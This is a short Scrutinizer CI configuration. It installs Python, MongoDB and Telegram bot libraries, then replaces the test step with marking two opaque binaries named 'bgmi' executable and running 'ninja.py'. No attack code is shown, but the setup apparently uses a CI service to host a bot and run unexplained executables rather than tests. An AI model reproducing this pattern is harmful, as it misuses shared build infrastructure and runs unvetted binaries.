# .scrutinizer.yml

build:
  environment:
    idle_timeout: 300
    python:
      version: 3.10  # Can use 3.8-3.12 depending on needs
  dependencies:
    before:
      - python3 -m ensurepip  # Ensure pip is installed for PyPy
      - pip install --upgrade pip
      - pip install motor pytz pymongo telebot python-telegram-bot aiohttp
      # If you need specific versions, use:
      # - pip install motor==3.1.1 pytz==2023.3 pymongo==4.5.0 python-telegram-bot==20.3 aiohttp==3.8.5

  tests:
    override:
      - chmod +x bgmi || true
      - chmod +x bgmi1240179115 || true
      # Prevent failure if file doesn't exist
      - python3 ninja.py
